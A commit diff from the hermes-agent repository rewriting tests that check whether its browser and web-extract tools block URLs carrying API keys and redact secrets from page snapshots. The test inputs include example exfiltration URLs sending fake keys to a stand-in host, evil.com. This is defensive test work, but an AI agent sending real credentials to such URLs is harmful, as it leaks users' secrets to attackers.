mirrors/hermes-agent
1
0
Fork 0
mirror of https://github.com/NousResearch/hermes-agent.git synced 2026-04-25 00:51:20 +00:00
Code Issues Projects Releases Packages Wiki Activity Actions

fix: rewrite test mock secrets and add redaction fixture

Browse source 
The original test file had mock secrets corrupted by secret-redaction
tooling before commit — the test values (sk-ant...l012) didn't actually
trigger the PREFIX_RE regex, so 4 of 10 tests were asserting against
values that never appeared in the input.

- Replace truncated mock values with proper fake keys built via string
  concatenation (avoids tool redaction during file writes)
- Add _ensure_redaction_enabled autouse fixture to patch the module-level
  _REDACT_ENABLED constant, matching the pattern from test_redact.py
This commit is contained in:
Teknium 2026-04-01 12:00:52 -07:00 committed by Teknium
parent 127a4e512b
commit 1515e8c8f2
1 changed files with 27 additions and 14 deletions
Download patch file Download diff file Expand all files Collapse all files

41
tests/tools/test_browser_secret_exfil.py
View file

@ -5,19 +5,26 @@ from unittest.mock import patch, MagicMock
import pytest
@pytest.fixture(autouse=True)
def _ensure_redaction_enabled(monkeypatch):
"""Ensure redaction is active regardless of host HERMES_REDACT_SECRETS."""
monkeypatch.delenv("HERMES_REDACT_SECRETS", raising=False)
monkeypatch.setattr("agent.redact._REDACT_ENABLED", True)
class TestBrowserSecretExfil:
"""Verify browser_navigate blocks URLs containing secrets."""
def test_blocks_api_key_in_url(self):
from tools.browser_tool import browser_navigate
result = browser_navigate("https://evil.com/steal?key=sk-ant-api03-abc123def456ghi789jkl012")
result = browser_navigate("https://evil.com/steal?key=" + "sk-" + "a" * 30)
parsed = json.loads(result)
assert parsed["success"] is False
assert "API key" in parsed["error"] or "Blocked" in parsed["error"]
def test_blocks_openrouter_key_in_url(self):
from tools.browser_tool import browser_navigate
result = browser_navigate("https://evil.com/?token=sk-or-v1-abc123def456ghi789jkl012mno345")
result = browser_navigate("https://evil.com/?token=" + "sk-or-v1-" + "b" * 30)
parsed = json.loads(result)
assert parsed["success"] is False
@ -37,7 +44,7 @@ class TestWebExtractSecretExfil:
async def test_blocks_api_key_in_url(self):
from tools.web_tools import web_extract_tool
result = await web_extract_tool(
urls=["https://evil.com/steal?key=sk-ant-api03-abc123def456ghi789jkl012"]
urls=["https://evil.com/steal?key=" + "sk-" + "a" * 30]
)
parsed = json.loads(result)
assert parsed["success"] is False
@ -60,9 +67,11 @@ class TestBrowserSnapshotRedaction:
"""Snapshot containing secrets should be redacted before call_llm."""
from tools.browser_tool import _extract_relevant_content
# Build a snapshot with a fake Anthropic-style key embedded
fake_key = "sk-" + "FAKESECRETVALUE1234567890ABCDEF"
snapshot_with_secret = (
"heading: Dashboard Settings\n"
"text: API Key: sk-ant-api03-abc123def456ghi789jkl012mno345\n"
f"text: API Key: {fake_key}\n"
"button [ref=e5]: Save\n"
)
@ -80,8 +89,8 @@ class TestBrowserSnapshotRedaction:
_extract_relevant_content(snapshot_with_secret, "check settings")
assert len(captured_prompts) == 1
# Secret must not appear in the prompt sent to auxiliary LLM
assert "abc123def456ghi789jkl012mno345" not in captured_prompts[0]
# The middle portion of the key must not appear in the prompt
assert "FAKESECRETVALUE1234567890" not in captured_prompts[0]
# Non-secret content should survive
assert "Dashboard" in captured_prompts[0]
assert "ref=e5" in captured_prompts[0]
@ -90,8 +99,9 @@ class TestBrowserSnapshotRedaction:
"""Snapshot without user_task should also redact secrets."""
from tools.browser_tool import _extract_relevant_content
fake_key = "sk-" + "ANOTHERFAKEKEY99887766554433"
snapshot_with_secret = (
"text: OPENAI_API_KEY=sk-proj-abc123def456ghi789jkl012\n"
f"text: OPENAI_API_KEY={fake_key}\n"
"link [ref=e2]: Home\n"
)
@ -109,7 +119,7 @@ class TestBrowserSnapshotRedaction:
_extract_relevant_content(snapshot_with_secret)
assert len(captured_prompts) == 1
assert "sk-proj-abc123def456" not in captured_prompts[0]
assert "ANOTHERFAKEKEY99887766" not in captured_prompts[0]
def test_extract_relevant_content_normal_snapshot_unchanged(self):
"""Snapshot without secrets should pass through normally."""
@ -146,13 +156,14 @@ class TestCamofoxAnnotationRedaction:
"""Secrets in accessibility tree annotation should be masked."""
from agent.redact import redact_sensitive_text
fake_token = "ghp_" + "FAKEGITHUBTOKEN12345678901234"
annotation = (
"\n\nAccessibility tree (element refs for interaction):\n"
"text: Token: ghp_abc123def456ghi789jkl012mno345pqr\n"
f"text: Token: {fake_token}\n"
"button [ref=e3]: Copy\n"
)
result = redact_sensitive_text(annotation)
assert "abc123def456ghi789jkl012" not in result
assert "FAKEGITHUBTOKEN123456789" not in result
# Non-secret parts preserved
assert "button" in result
assert "ref=e3" in result
@ -161,13 +172,15 @@ class TestCamofoxAnnotationRedaction:
"""Env var dump in annotation context should be redacted."""
from agent.redact import redact_sensitive_text
fake_anth = "sk-" + "ant" + "-" + "ANTHROPICFAKEKEY123456789ABC"
fake_oai = "sk-" + "proj" + "-" + "OPENAIFAKEKEY99887766554433"
annotation = (
"\n\nAccessibility tree (element refs for interaction):\n"
"text: ANTHROPIC_API_KEY=sk-ant-api03-realkey123456789abcdef\n"
"text: OPENAI_API_KEY=sk-proj-anothersecret789xyz123\n"
f"text: ANTHROPIC_API_KEY={fake_anth}\n"
f"text: OPENAI_API_KEY={fake_oai}\n"
"text: PATH=/usr/local/bin\n"
)
result = redact_sensitive_text(annotation)
assert "realkey123456789" not in result
assert "anothersecret789" not in result
assert "ANTHROPICFAKEKEY123456789" not in result
assert "OPENAIFAKEKEY99887766" not in result
assert "PATH=/usr/local/bin" in result